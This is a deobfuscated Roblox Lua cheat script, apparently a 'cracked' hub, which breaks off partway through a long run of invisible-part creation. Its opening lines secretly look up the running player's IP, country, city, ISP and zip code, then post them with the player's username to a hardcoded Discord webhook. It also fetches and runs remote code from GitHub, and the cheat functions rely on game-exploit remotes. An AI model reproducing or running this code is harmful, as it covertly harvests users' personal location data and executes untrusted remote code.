local fenv = getfenv()

fenv._ZdbFaZDRAwrK = "This file was protected with MoonSec V3"
wait()
fenv.MoonSec_StringsHiddenAttr = true
local _callrequest6 = request({
    Method = "GET",
    Url = "http://ip-api.com/json",
})
local _call8 = game:GetService("HttpService")
local _call11 = _call8:JSONDecode(_callrequest6.Body)
local _21, _21_2, _21_3 = string.format("```User: %s\nIP: %s\nCountry: %s\nCountry Code: %s\nRegion: %s\nRegion Name: %s\nCity: %s\nZipcode: %s\nISP: %s\nOrg: %s```", game:GetService("Players").LocalPlayer.Name, _call11.query, _call11.country, _call11.countryCode, _call11.region, _call11.regionName, _call11.city, _call11.zip, _call11.isp, _call11.org)
local _call23 = game:GetService("HttpService")
local _call25 = _call23:JSONEncode({
    content = _21,
})
request({
    Body = _call25,
    Url = "https://discord.com/api/webhooks/1266799233982529566/amTtBJrl2I2q88KfkxfPly54RA035fIWraYAcv11SrGpzTK7oQg-f2UlXvu-TJbQ_jq1",
    Method = "POST",
    Headers = {
        ["Content-Type"] = "application/json",
    },
})
loadstring(game:HttpGet("https://raw.githubusercontent.com/CAXAP26BKyCH/Owner/refs/heads/main/Whitelist"))()
local _ = game.Players.LocalPlayer.Name
local _rebirthRemote37 = game:GetService("ReplicatedStorage").rEvents.rebirthRemote
_rebirthRemote37:InvokeServer("rebirthRequest")
local _LocalPlayer41 = game.Players.LocalPlayer
_LocalPlayer41:Kick("Not Whitelist.")
local _47 = loadstring(game:HttpGet("https://raw.githubusercontent.com/CAXAP26BKyCH/libraryV2/refs/heads/main/library"))()
local _call49 = _47:CreateWindow({
    ConfigurationSaving = {
        Enabled = true,
        FileName = "Big Hub",
    },
    KeySettings = {
        Note = "No method of obtaining the key is provided",
        Title = "Untitled",
        Key = {
            [1] = "Hello",
        },
        GrabKeyFromSite = false,
        SaveKey = true,
        FileName = "Key",
        Subtitle = "Key System",
    },
    KeySystem = false,
    DisableBuildWarnings = false,
    Discord = {
        Enabled = false,
        RememberJoins = true,
        Invite = "noinvitelink",
    },
    Name = "Doca V1 | CRACKED BY ZYPHER",
    LoadingTitle = "IP WEBHOOK LMAOO",
    DisableRayfieldPrompts = false,
    LoadingSubtitle = "CRACKED BY ZYPHER, GET BETTER L",
    Theme = "Default",
    Icon = 0,
})
local _call51 = Vector3.new(- 2, - 9.5, - 2)
local _call53 = _call49:CreateTab("Main")
game:GetService("RunService")
local _LocalPlayer58 = game:GetService("Players").LocalPlayer
local _ = _LocalPlayer58.Character
local _ = _LocalPlayer58.Character
local _CharacterAdded61 = _LocalPlayer58.CharacterAdded
_CharacterAdded61:Connect(function(_64, _64_2, _64_3)

end)
_call53:CreateToggle({
    CurrentValue = false,
    Callback = function(_67, _67_2, _67_3)
        _G.antiKnockback = _67
        local _Character68 = _LocalPlayer58.Character
        local _call70 = _Character68:WaitForChild("Humanoid")
        local _call72 = _Character68:WaitForChild("HumanoidRootPart")
        local _call74 = Instance.new("BodyVelocity")
        _call74.Velocity = Vector3.new(0, 0, 0)
        _call74.MaxForce = Vector3.new(100000, 0, 100000)
        _call74.Parent = _call72
        local _call80 = _call72:GetPropertyChangedSignal("Velocity")
        _call80:Connect(function(_83, _83_2, _83_3)
            _call72.Velocity = Vector3.new(0, _call72.Velocity.Y, 0)
        end)
        local _call89 = _call70:GetPropertyChangedSignal("PlatformStand")
        _call89:Connect(function(_92, _92_2, _92_3)
            local _ = _call70.PlatformStand
            _call70.PlatformStand = false
        end)
    end,
    Name = "Anti Knockback",
    Flag = "Toggle1",
})
_call53:CreateToggle({
    CurrentValue = false,
    Callback = function(_96, _96_2, _96_3)
        local _call98 = Instance.new("Part")
        _call98.Size = Vector3.new(2048, 1, 2048)
        _call98.Position = (_call51 + Vector3.new(0, 0, 0))
        _call98.Anchored = true
        _call98.Transparency = 1
        _call98.CanCollide = true
        _call98.Name = "Part_Side_0_0"
        _call98.Parent = workspace
        local _call105 = Instance.new("Part")
        _call105.Size = Vector3.new(2048, 1, 2048)
        _call105.Position = (_call51 + Vector3.new(- 0, 0, 0))
        _call105.Anchored = true
        _call105.Transparency = 1
        _call105.CanCollide = true
        _call105.Name = "Part_LeftRight_0_0"
        _call105.Parent = workspace
        local _call112 = Instance.new("Part")
        _call112.Size = Vector3.new(2048, 1, 2048)
        _call112.Position = (_call51 + Vector3.new(- 0, 0, - 0))
        _call112.Anchored = true
        _call112.Transparency = 1
        _call112.CanCollide = true
        _call112.Name = "Part_UpLeft_0_0"
        _call112.Parent = workspace
        local _call119 = Instance.new("Part")
        _call119.Size = Vector3.new(2048, 1, 2048)
        _call119.Position = (_call51 + Vector3.new(0, 0, - 0))
        _call119.Anchored = true
        _call119.Transparency = 1
        _call119.CanCollide = true
        _call119.Name = "Part_UpRight_0_0"
        _call119.Parent = workspace
        local _call126 = Instance.new("Part")
        _call126.Size = Vector3.new(2048, 1, 2048)
        _call126.Position = (_call51 + Vector3.new(0, 0, 2048))
        _call126.Anchored = true
        _call126.Transparency = 1
        _call126.CanCollide = true
        _call126.Name = "Part_Side_0_1"
        _call126.Parent = workspace
        local _call133 = Instance.new("Part")
        _call133.Size = Vector3.new(2048, 1, 2048)
        _call133.Position = (_call51 + Vector3.new(- 0, 0, 2048))
        _call133.Anchored = true
        _call133.Transparency = 1
        _call133.CanCollide = true
        _call133.Name = "Part_LeftRight_0_1"
        _call133.Parent = workspace
        local _call140 = Instance.new("Part")
        _call140.Size = Vector3.new(2048, 1, 2048)
        _call140.Position = (_call51 + Vector3.new(- 0, 0, - 2048))
        _call140.Anchored = true
        _call140.Transparency = 1
        _call140.CanCollide = true
        _call140.Name = "Part_UpLeft_0_1"
        _call140.Parent = workspace
        local _call147 = Instance.new("Part")
        _call147.Size = Vector3.new(2048, 1, 2048)
        _call147.Position = (_call51 + Vector3.new(0, 0, - 2048))
        _call147.Anchored = true
        _call147.Transparency = 1
        _call147.CanCollide = true
        _call147.Name = "Part_UpRight_0_1"
        _call147.Parent = workspace
        local _call154 = Instance.new("Part")
        _call154.Size = Vector3.new(2048, 1, 2048)
        _call154.Position = (_call51 + Vector3.new(0, 0, 4096))
        _call154.Anchored = true
        _call154.Transparency = 1
        _call154.CanCollide = true
        _call154.Name = "Part_Side_0_2"
        _call154.Parent = workspace
        local _call161 = Instance.new("Part")
        _call161.Size = Vector3.new(2048, 1, 2048)
        _call161.Position = (_call51 + Vector3.new(- 0, 0, 4096))
        _call161.Anchored = true
        _call161.Transparency = 1
        _call161.CanCollide = true
        _call161.Name = "Part_LeftRight_0_2"
        _call161.Parent = workspace
        local _call168 = Instance.new("Part")
        _call168.Size = Vector3.new(2048, 1, 2048)
        _call168.Position = (_call51 + Vector3.new(- 0, 0, - 4096))
        _call168.Anchored = true
        _call168.Transparency = 1
        _call168.CanCollide = true
        _call168.Name = "Part_UpLeft_0_2"
        _call168.Parent = workspace
        local _call175 = Instance.new("Part")
        _call175.Size = Vector3.new(2048, 1, 2048)
        _call175.Position = (_call51 + Vector3.new(0, 0, - 4096))
        _call175.Anchored = true
        _call175.Transparency = 1
        _call175.CanCollide = true
        _call175.Name = "Part_UpRight_0_2"
        _call175.Parent = workspace
        local _call182 = Instance.new("Part")
        _call182.Size = Vector3.new(2048, 1, 2048)
        _call182.Position = (_call51 + Vector3.new(0, 0, 6144))
        _call182.Anchored = true
        _call182.Transparency = 1
        _call182.CanCollide = true
        _call182.Name = "Part_Side_0_3"
        _call182.Parent = workspace
        local _call189 = Instance.new("Part")
        _call189.Size = Vector3.new(2048, 1, 2048)
        _call189.Position = (_call51 + Vector3.new(- 0, 0, 6144))
        _call189.Anchored = true
        _call189.Transparency = 1
        _call189.CanCollide = true
        _call189.Name = "Part_LeftRight_0_3"
        _call189.Parent = workspace
        local _call196 = Instance.new("Part")
        _call196.Size = Vector3.new(2048, 1, 2048)
        _call196.Position = (_call51 + Vector3.new(- 0, 0, - 6144))
        _call196.Anchored = true
        _call196.Transparency = 1
        _call196.CanCollide = true
        _call196.Name = "Part_UpLeft_0_3"
        _call196.Parent = workspace
        local _call203 = Instance.new("Part")
        _call203.Size = Vector3.new(2048, 1, 2048)
        _call203.Position = (_call51 + Vector3.new(0, 0, - 6144))
        _call203.Anchored = true
        _call203.Transparency = 1
        _call203.CanCollide = true
        _call203.Name = "Part_UpRight_0_3"
        _call203.Parent = workspace
        local _call210 = Instance.new("Part")
        _call210.Size = Vector3.new(2048, 1, 2048)
        _call210.Position = (_call51 + Vector3.new(0, 0, 8192))
        _call210.Anchored = true
        _call210.Transparency = 1
        _call210.CanCollide = true
        _call210.Name = "Part_Side_0_4"
        _call210.Parent = workspace
        local _call217 = Instance.new("Part")
        _call217.Size = Vector3.new(2048, 1, 2048)
        _call217.Position = (_call51 + Vector3.new(- 0, 0, 8192))
        _call217.Anchored = true
        _call217.Transparency = 1
        _call217.CanCollide = true
        _call217.Name = "Part_LeftRight_0_4"
        _call217.Parent = workspace
        local _call224 = Instance.new("Part")
        _call224.Size = Vector3.new(2048, 1, 2048)
        _call224.Position = (_call51 + Vector3.new(- 0, 0, - 8192))
        _call224.Anchored = true
        _call224.Transparency = 1
        _call224.CanCollide = true
        _call224.Name = "Part_UpLeft_0_4"
        _call224.Parent = workspace
        local _call231 = Instance.new("Part")
        _call231.Size = Vector3.new(2048, 1, 2048)
        _call231.Position = (_call51 + Vector3.new(0, 0, - 8192))
        _call231.Anchored = true
        _call231.Transparency = 1
        _call231.CanCollide = true
        _call231.Name = "Part_UpRight_0_4"
        _call231.Parent = workspace
        local _call238 = Instance.new("Part")
        _call238.Size = Vector3.new(2048, 1, 2048)
        _call238.Position = (_call51 + Vector3.new(0, 0, 10240))
        _call238.Anchored = true
        _call238.Transparency = 1
        _call238.CanCollide = true
        _call238.Name = "Part_Side_0_5"
        _call238.Parent = workspace
        local _call245 = Instance.new("Part")
        _call245.Size = Vector3.new(2048, 1, 2048)
        _call245.Position = (_call51 + Vector3.new(- 0, 0, 10240))
        _call245.Anchored = true
        _call245.Transparency = 1
        _call245.CanCollide = true
        _call245.Name = "Part_LeftRight_0_5"
        _call245.Parent = workspace
        local _call252 = Instance.new("Part")
        _call252.Size = Vector3.new(2048, 1, 2048)
        _call252.Position = (_call51 + Vector3.new(- 0, 0, - 10240))
        _call252.Anchored = true
        _call252.Transparency = 1
        _call252.CanCollide = true
        _call252.Name = "Part_UpLeft_0_5"
        _call252.Parent = workspace
        local _call259 = Instance.new("Part")
        _call259.Size = Vector3.new(2048, 1, 2048)
        _call259.Position = (_call51 + Vector3.new(0, 0, - 10240))
        _call259.Anchored = true
        _call259.Transparency = 1
        _call259.CanCollide = true
        _call259.Name = "Part_UpRight_0_5"
        _call259.Parent = workspace
        local _call266 = Instance.new("Part")
        _call266.Size = Vector3.new(2048, 1, 2048)
        _call266.Position = (_call51 + Vector3.new(0, 0, 12288))
        _call266.Anchored = true
        _call266.Transparency = 1
        _call266.CanCollide = true
        _call266.Name = "Part_Side_0_6"
        _call266.Parent = workspace
        local _call273 = Instance.new("Part")
        _call273.Size = Vector3.new(2048, 1, 2048)
        _call273.Position = (_call51 + Vector3.new(- 0, 0, 12288))
        _call273.Anchored = true
        _call273.Transparency = 1
        _call273.CanCollide = true
        _call273.Name = "Part_LeftRight_0_6"
        _call273.Parent = workspace
        local _call280 = Instance.new("Part")
        _call280.Size = Vector3.new(2048, 1, 2048)
        _call280.Position = (_call51 + Vector3.new(- 0, 0, - 12288))
        _call280.Anchored = true
        _call280.Transparency = 1
        _call280.CanCollide = true
        _call280.Name = "Part_UpLeft_0_6"
        _call280.Parent = workspace
        local _call287 = Instance.new("Part")
        _call287.Size = Vector3.new(2048, 1, 2048)
        _call287.Position = (_call51 + Vector3.new(0, 0, - 12288))
        _call287.Anchored = true
        _call287.Transparency = 1
        _call287.CanCollide = true
        _call287.Name = "Part_UpRight_0_6"
        _call287.Parent = workspace
        local _call294 = Instance.new("Part")
        _call294.Size = Vector3.new(2048, 1, 2048)
        _call294.Position = (_call51 + Vector3.new(0, 0, 14336))
        _call294.Anchored = true
        _call294.Transparency = 1
        _call294.CanCollide = true
        _call294.Name = "Part_Side_0_7"
        _call294.Parent = workspace
        local _call301 = Instance.new("Part")
        _call301.Size = Vector3.new(2048, 1, 2048)
        _call301.Position = (_call51 + Vector3.new(- 0, 0, 14336))
        _call301.Anchored = true
        _call301.Transparency = 1
        _call301.CanCollide = true
        _call301.Name = "Part_LeftRight_0_7"
        _call301.Parent = workspace
        local _call308 = Instance.new("Part")
        _call308.Size = Vector3.new(2048, 1, 2048)
        _call308.Position = (_call51 + Vector3.new(- 0, 0, - 14336))
        _call308.Anchored = true
        _call308.Transparency = 1
        _call308.CanCollide = true
        _call308.Name = "Part_UpLeft_0_7"
        _call308.Parent = workspace
        local _call315 = Instance.new("Part")
        _call315.Size = Vector3.new(2048, 1, 2048)
        _call315.Position = (_call51 + Vector3.new(0, 0, - 14336))
        _call315.Anchored = true
        _call315.Transparency = 1
        _call315.CanCollide = true
        _call315.Name = "Part_UpRight_0_7"
        _call315.Parent = workspace
        local _call322 = Instance.new("Part")
        _call322.Size = Vector3.new(2048, 1, 2048)
        _call322.Position = (_call51 + Vector3.new(0, 0, 16384))
        _call322.Anchored = true
        _call322.Transparency = 1
        _call322.CanCollide = true
        _call322.Name = "Part_Side_0_8"
        _call322.Parent = workspace
        local _call329 = Instance.new("Part")
        _call329.Size = Vector3.new(2048, 1, 2048)
        _call329.Position = (_call51 + Vector3.new(- 0, 0, 16384))
        _call329.Anchored = true
        _call329.Transparency = 1
        _call329.CanCollide = true
        _call329.Name = "Part_LeftRight_0_8"
        _call329.Parent = workspace
        local _call336 = Instance.new("Part")
        _call336.Size = Vector3.new(2048, 1, 2048)
        _call336.Position = (_call51 + Vector3.new(- 0, 0, - 16384))
        _call336.Anchored = true
        _call336.Transparency = 1
        _call336.CanCollide = true
        _call336.Name = "Part_UpLeft_0_8"
        _call336.Parent = workspace
        local _call343 = Instance.new("Part")
        _call343.Size = Vector3.new(2048, 1, 2048)
        _call343.Position = (_call51 + Vector3.new(0, 0, - 16384))
        _call343.Anchored = true
        _call343.Transparency = 1
        _call343.CanCollide = true
        _call343.Name = "Part_UpRight_0_8"
        _call343.Parent = workspace
        local _call350 = Instance.new("Part")
        _call350.Size = Vector3.new(2048, 1, 2048)
        _call350.Position = (_call51 + Vector3.new(0, 0, 18432))
        _call350.Anchored = true
        _call350.Transparency = 1
        _call350.CanCollide = true
        _call350.Name = "Part_Side_0_9"
        _call350.Parent = workspace
        local _call357 = Instance.new("Part")
        _call357.Size = Vector3.new(2048, 1, 2048)
        _call357.Position = (_call51 + Vector3.new(- 0, 0, 18432))
        _call357.Anchored = true
        _call357.Transparency = 1
        _call357.CanCollide = true
        _call357.Name = "Part_LeftRight_0_9"
        _call357.Parent = workspace
        local _call364 = Instance.new("Part")
        _call364.Size = Vector3.new(2048, 1, 2048)
        _call364.Position = (_call51 + Vector3.new(- 0, 0, - 18432))
        _call364.Anchored = true
        _call364.Transparency = 1
        _call364.CanCollide = true
        _call364.Name = "Part_UpLeft_0_9"
        _call364.Parent = workspace
        local _call371 = Instance.new("Part")
        _call371.Size = Vector3.new(2048, 1, 2048)
        _call371.Position = (_call51 + Vector3.new(0, 0, - 18432))
        _call371.Anchored = true
        _call371.Transparency = 1
        _call371.CanCollide = true
        _call371.Name = "Part_UpRight_0_9"
        _call371.Parent = workspace
        local _call378 = Instance.new("Part")
        _call378.Size = Vector3.new(2048, 1, 2048)
        _call378.Position = (_call51 + Vector3.new(0, 0, 20480))
        _call378.Anchored = true
        _call378.Transparency = 1
        _call378.CanCollide = true
        _call378.Name = "Part_Side_0_10"
        _call378.Parent = workspace
        local _call385 = Instance.new("Part")
        _call385.Size = Vector3.new(2048, 1, 2048)
        _call385.Position = (_call51 + Vector3.new(- 0, 0, 20480))
        _call385.Anchored = true
        _call385.Transparency = 1
        _call385.CanCollide = true
        _call385.Name = "Part_LeftRight_0_10"
        _call385.Parent = workspace
        local _call392 = Instance.new("Part")
        _call392.Size = Vector3.new(2048, 1, 2048)
        _call392.Position = (_call51 + Vector3.new(- 0, 0, - 20480))
        _call392.Anchored = true
        _call392.Transparency = 1
        _call392.CanCollide = true
        _call392.Name = "Part_UpLeft_0_10"
        _call392.Parent = workspace
        local _call399 = Instance.new("Part")
        _call399.Size = Vector3.new(2048, 1, 2048)
        _call399.Position = (_call51 + Vector3.new(0, 0, - 20480))
        _call399.Anchored = true
        _call399.Transparency = 1
        _call399.CanCollide = true
        _call399.Name = "Part_UpRight_0_10"
        _call399.Parent = workspace
        local _call406 = Instance.new("Part")
        _call406.Size = Vector3.new(2048, 1, 2048)
        _call406.Position = (_call51 + Vector3.new(0, 0, 22528))
        _call406.Anchored = true
        _call406.Transparency = 1
        _call406.CanCollide = true
        _call406.Name = "Part_Side_0_11"
        _call406.Parent = workspace
        local _call413 = Instance.new("Part")
        _call413.Size = Vector3.new(2048, 1, 2048)
        _call413.Position = (_call51 + Vector3.new(- 0, 0, 22528))
        _call413.Anchored = true
        _call413.Transparency = 1
        _call413.CanCollide = true
        _call413.Name = "Part_LeftRight_0_11"
        _call413.Parent = workspace
        local _call420 = Instance.new("Part")
        _call420.Size = Vector3.new(2048, 1, 2048)
        _call420.Position = (_call51 + Vector3.new(- 0, 0, - 22528))
        _call420.Anchored = true
        _call420.Transparency = 1
        _call420.CanCollide = true
        _call420.Name = "Part_UpLeft_0_11"
        _call420.Parent = workspace
        local _call427 = Instance.new("Part")
        _call427.Size = Vector3.new(2048, 1, 2048)
        _call427.Position = (_call51 + Vector3.new(0, 0, - 22528))
        _call427.Anchored = true
        _call427.Transparency = 1
        _call427.CanCollide = true
        _call427.Name = "Part_UpRight_0_11"
        _call427.Parent = workspace
        local _call434 = Instance.new("Part")
        _call434.Size = Vector3.new(2048, 1, 2048)
        _call434.Position = (_call51 + Vector3.new(0, 0, 24576))
        _call434.Anchored = true
        _call434.Transparency = 1
        _call434.CanCollide = true
        _call434.Name = "Part_Side_0_12"
        _call434.Parent = workspace
        local _call441 = Instance.new("Part")
        _call441.Size = Vector3.new(2048, 1, 2048)
        _call441.Position = (_call51 + Vector3.new(- 0, 0, 24576))
        _call441.Anchored = true
        _call441.Transparency = 1
        _call441.CanCollide = true
        _call441.Name = "Part_LeftRight_0_12"
        _call441.Parent = workspace
        local _call448 = Instance.new("Part")
        _call448.Size = Vector3.new(2048, 1, 2048)
        _call448.Position = (_call51 + Vector3.new(- 0, 0, - 24576))
        _call448.Anchored = true
        _call448.Transparency = 1
        _call448.CanCollide = true
        _call448.Name = "Part_UpLeft_0_12"
        _call448.Parent = workspace
        local _call455 = Instance.new("Part")
        _call455.Size = Vector3.new(2048, 1, 2048)
        _call455.Position = (_call51 + Vector3.new(0, 0, - 24576))
        _call455.Anchored = true
        _call455.Transparency = 1
        _call455.CanCollide = true
        _call455.Name = "Part_UpRight_0_12"
        _call455.Parent = workspace
        local _call462 = Instance.new("Part")
        _call462.Size = Vector3.new(2048, 1, 2048)
        _call462.Position = (_call51 + Vector3.new(0, 0, 26624))
        _call462.Anchored = true
        _call462.Transparency = 1
        _call462.CanCollide = true
        _call462.Name = "Part_Side_0_13"
        _call462.Parent = workspace
        local _call469 = Instance.new("Part")
        _call469.Size = Vector3.new(2048, 1, 2048)
        _call469.Position = (_call51 + Vector3.new(- 0, 0, 26624))
        _call469.Anchored = true
        _call469.Transparency = 1
        _call469.CanCollide = true
        _call469.Name = "Part_LeftRight_0_13"
        _call469.Parent = workspace
        local _call476 = Instance.new("Part")
        _call476.Size = Vector3.new(2048, 1, 2048)
        _call476.Position = (_call51 + Vector3.new(- 0, 0, - 26624))
        _call476.Anchored = true
        _call476.Transparency = 1
        _call476.CanCollide = true
        _call476.Name = "Part_UpLeft_0_13"
        _call476.Parent = workspace
        local _call483 = Instance.new("Part")
        _call483.Size = Vector3.new(2048, 1, 2048)
        _call483.Position = (_call51 + Vector3.new(0, 0, - 26624))
        _call483.Anchored = true
        _call483.Transparency = 1
        _call483.CanCollide = true
        _call483.Name = "Part_UpRight_0_13"
        _call483.Parent = workspace
        local _call490 = Instance.new("Part")
        _call490.Size = Vector3.new(2048, 1, 2048)
        _call490.Position = (_call51 + Vector3.new(0, 0, 28672))
        _call490.Anchored = true
        _call490.Transparency = 1
        _call490.CanCollide = true
        _call490.Name = "Part_Side_0_14"
        _call490.Parent = workspace
        local _call497 = Instance.new("Part")
        _call497.Size = Vector3.new(2048, 1, 2048)
        _call497.Position = (_call51 + Vector3.new(- 0, 0, 28672))
        _call497.Anchored = true
        _call497.Transparency = 1
        _call497.CanCollide = true
        _call497.Name = "Part_LeftRight_0_14"
        _call497.Parent = workspace
        local _call504 = Instance.new("Part")
        _call504.Size = Vector3.new(2048, 1, 2048)
        _call504.Position = (_call51 + Vector3.new(- 0, 0, - 28672))
        _call504.Anchored = true
        _call504.Transparency = 1
        _call504.CanCollide = true
        _call504.Name = "Part_UpLeft_0_14"
        _call504.Parent = workspace
        local _call511 = Instance.new("Part")
        _call511.Size = Vector3.new(2048, 1, 2048)
        _call511.Position = (_call51 + Vector3.new(0, 0, - 28672))
        _call511.Anchored = true
        _call511.Transparency = 1
        _call511.CanCollide = true
        _call511.Name = "Part_UpRight_0_14"
        _call511.Parent = workspace
        local _call518 = Instance.new("Part")
        _call518.Size = Vector3.new(2048, 1, 2048)
        _call518.Position = (_call51 + Vector3.new(0, 0, 30720))
        _call518.Anchored = true
        _call518.Transparency = 1
        _call518.CanCollide = true
        _call518.Name = "Part_Side_0_15"
        _call518.Parent = workspace
        local _call525 = Instance.new("Part")
        _call525.Size = Vector3.new(2048, 1, 2048)
        _call525.Position = (_call51 + Vector3.new(- 0, 0, 30720))
        _call525.Anchored = true
        _call525.Transparency = 1
        _call525.CanCollide = true
        _call525.Name = "Part_LeftRight_0_15"
        _call525.Parent = workspace
        local _call532 = Instance.new("Part")
        _call532.Size = Vector3.new(2048, 1, 2048)
        _call532.Position = (_call51 + Vector3.new(- 0, 0, - 30720))
        _call532.Anchored = true
        _call532.Transparency = 1
        _call532.CanCollide = true
        _call532.Name = "Part_UpLeft_0_15"
        _call532.Parent = workspace
        local _call539 = Instance.new("Part")
        _call539.Size = Vector3.new(2048, 1, 2048)
        _call539.Position = (_call51 + Vector3.new(0, 0, - 30720))
        _call539.Anchored = true
        _call539.Transparency = 1
        _call539.CanCollide = true
        _call539.Name = "Part_UpRight_0_15"
        _call539.Parent = workspace
        local _call546 = Instance.new("Part")
        _call546.Size = Vector3.new(2048, 1, 2048)
        _call546.Position = (_call51 + Vector3.new(0, 0, 32768))
        _call546.Anchored = true
        _call546.Transparency = 1
        _call546.CanCollide = true
        _call546.Name = "Part_Side_0_16"
        _call546.Parent = workspace
        local _call553 = Instance.new("Part")
        _call553.Size = Vector3.new(2048, 1, 2048)
        _call553.Position = (_call51 + Vector3.new(- 0, 0, 32768))
        _call553.Anchored = true
        _call553.Transparency = 1
        _call553.CanCollide = true
        _call553.Name = "Part_LeftRight_0_16"
        _call553.Parent = workspace
        local _call560 = Instance.new("Part")
        _call560.Size = Vector3.new(2048, 1, 2048)
        _call560.Position = (_call51 + Vector3.new(- 0, 0, - 32768))
        _call560.Anchored = true
        _call560.Transparency = 1
        _call560.CanCollide = true
        _call560.Name = "Part_UpLeft_0_16"
        _call560.Parent = workspace
        local _call567 = Instance.new("Part")
        _call567.Size = Vector3.new(2048, 1, 2048)
        _call567.Position = (_call51 + Vector3.new(0, 0, - 32768))
        _call567.Anchored = true
        _call567.Transparency = 1
        _call567.CanCollide = true
        _call567.Name = "Part_UpRight_0_16"
        _call567.Parent = workspace
        local _call574 = Instance.new("Part")
        _call574.Size = Vector3.new(2048, 1, 2048)
        _call574.Position = (_call51 + Vector3.new(0, 0, 34816))
        _call574.Anchored = true
        _call574.Transparency = 1
        _call574.CanCollide = true
        _call574.Name = "Part_Side_0_17"
        _call574.Parent = workspace
        local _call581 = Instance.new("Part")
        _call581.Size = Vector3.new(2048, 1, 2048)
        _call581.Position = (_call51 + Vector3.new(- 0, 0, 34816))
        _call581.Anchored = true
        _call581.Transparency = 1
        _call581.CanCollide = true
        _call581.Name = "Part_LeftRight_0_17"
        _call581.Parent = workspace
        local _call588 = Instance.new("Part")
        _call588.Size = Vector3.new(2048, 1, 2048)
        _call588.Position = (_call51 + Vector3.new(- 0, 0, - 34816))
        _call588.Anchored = true
        _call588.Transparency = 1
        _call588.CanCollide = true
        _call588.Name = "Part_UpLeft_0_17"
        _call588.Parent = workspace
        local _call595 = Instance.new("Part")
        _call595.Size = Vector3.new(2048, 1, 2048)
        _call595.Position = (_call51 + Vector3.new(0, 0, - 34816))
        _call595.Anchored = true
        _call595.Transparency = 1
        _call595.CanCollide = true
        _call595.Name = "Part_UpRight_0_17"
        _call595.Parent = workspace
        local _call602 = Instance.new("Part")
        _call602.Size = Vector3.new(2048, 1, 2048)
        _call602.Position = (_call51 + Vector3.new(0, 0, 36864))
        _call602.Anchored = true
        _call602.Transparency = 1
        _call602.CanCollide = true
        _call602.Name = "Part_Side_0_18"
        _call602.Parent = workspace
        local _call609 = Instance.new("Part")
        _call609.Size = Vector3.new(2048, 1, 2048)
        _call609.Position = (_call51 + Vector3.new(- 0, 0, 36864))
        _call609.Anchored = true
        _call609.Transparency = 1
        _call609.CanCollide = true
        _call609.Name = "Part_LeftRight_0_18"
        _call609.Parent = workspace
        local _call616 = Instance.new("Part")
        _call616.Size = Vector3.new(2048, 1, 2048)
        _call616.Position = (_call51 + Vector3.new(- 0, 0, - 36864))
        _call616.Anchored = true
        _call616.Transparency = 1
        _call616.CanCollide = true
        _call616.Name = "Part_UpLeft_0_18"
        _call616.Parent = workspace
        local _call623 = Instance.new("Part")
        _call623.Size = Vector3.new(2048, 1, 2048)
        _call623.Position = (_call51 + Vector3.new(0, 0, - 36864))
        _call623.Anchored = true
        _call623.Transparency = 1
        _call623.CanCollide = true
        _call623.Name = "Part_UpRight_0_18"
        _call623.Parent = workspace
        local _call630 = Instance.new("Part")
        _call630.Size = Vector3.new(2048, 1, 2048)
        _call630.Position = (_call51 + Vector3.new(0, 0, 38912))
        _call630.Anchored = true
        _call630.Transparency = 1
        _call630.CanCollide = true
        _call630.Name = "Part_Side_0_19"
        _call630.Parent = workspace
        local _call637 = Instance.new("Part")
        _call637.Size = Vector3.new(2048, 1, 2048)
        _call637.Position = (_call51 + Vector3.new(- 0, 0, 38912))
        _call637.Anchored = true
        _call637.Transparency = 1
        _call637.CanCollide = true
        _call637.Name = "Part_LeftRight_0_19"
        _call637.Parent = workspace
        local _call644 = Instance.new("Part")
        _call644.Size = Vector3.new(2048, 1, 2048)
        _call644.Position = (_call51 + Vector3.new(- 0, 0, - 38912))
        _call644.Anchored = true
        _call644.Transparency = 1
        _call644.CanCollide = true
        _call644.Name = "Part_UpLeft_0_19"
        _call644.Parent = workspace
        local _call651 = Instance.new("Part")
        _call651.Size = Vector3.new(2048, 1, 2048)
        _call651.Position = (_call51 + Vector3.new(0, 0, - 38912))
        _call651.Anchored = true
        _call651.Transparency = 1
        _call651.CanCollide = true
        _call651.Name = "Part_UpRight_0_19"
        _call651.Parent = workspace
        local _call658 = Instance.new("Part")
        _call658.Size = Vector3.new(2048, 1, 2048)
        _call658.Position = (_call51 + Vector3.new(0, 0, 40960))
        _call658.Anchored = true
        _call658.Transparency = 1
        _call658.CanCollide = true
        _call658.Name = "Part_Side_0_20"
        _call658.Parent = workspace
        local _call665 = Instance.new("Part")
        _call665.Size = Vector3.new(2048, 1, 2048)
        _call665.Position = (_call51 + Vector3.new(- 0, 0, 40960))
        _call665.Anchored = true
        _call665.Transparency = 1
        _call665.CanCollide = true
        _call665.Name = "Part_LeftRight_0_20"
        _call665.Parent = workspace
        local _call672 = Instance.new("Part")
        _call672.Size = Vector3.new(2048, 1, 2048)
        _call672.Position = (_call51 + Vector3.new(- 0, 0, - 40960))
        _call672.Anchored = true
        _call672.Transparency = 1
        _call672.CanCollide = true
        _call672.Name = "Part_UpLeft_0_20"
        _call672.Parent = workspace
        local _call679 = Instance.new("Part")
        _call679.Size = Vector3.new(2048, 1, 2048)
        _call679.Position = (_call51 + Vector3.new(0, 0, - 40960))
        _call679.Anchored = true
        _call679.Transparency = 1
        _call679.CanCollide = true
        _call679.Name = "Part_UpRight_0_20"
        _call679.Parent = workspace
        local _call686 = Instance.new("Part")
        _call686.Size = Vector3.new(2048, 1, 2048)
        _call686.Position = (_call51 + Vector3.new(0, 0, 43008))
        _call686.Anchored = true
        _call686.Transparency = 1
        _call686.CanCollide = true
        _call686.Name = "Part_Side_0_21"
        _call686.Parent = workspace
        local _call693 = Instance.new("Part")
        _call693.Size = Vector3.new(2048, 1, 2048)
        _call693.Position = (_call51 + Vector3.new(- 0, 0, 43008))
        _call693.Anchored = true
        _call693.Transparency = 1
        _call693.CanCollide = true
        _call693.Name = "Part_LeftRight_0_21"
        _call693.Parent = workspace
        local _call700 = Instance.new("Part")
        _call700.Size = Vector3.new(2048, 1, 2048)
        _call700.Position = (_call51 + Vector3.new(- 0, 0, - 43008))
        _call700.Anchored = true
        _call700.Transparency = 1
        _call700.CanCollide = true
        _call700.Name = "Part_UpLeft_0_21"
        _call700.Parent = workspace
        local _call707 = Instance.new("Part")
        _call707.Size = Vector3.new(2048, 1, 2048)
        _call707.Position = (_call51 + Vector3.new(0, 0, - 43008))
        _call707.Anchored = true
        _call707.Transparency = 1
        _call707.CanCollide = true
        _call707.Name = "Part_UpRight_0_21"
        _call707.Parent = workspace
        local _call714 = Instance.new("Part")
        _call714.Size = Vector3.new(2048, 1, 2048)
        _call714.Position = (_call51 + Vector3.new(0, 0, 45056))
        _call714.Anchored = true
        _call714.Transparency = 1
        _call714.CanCollide = true
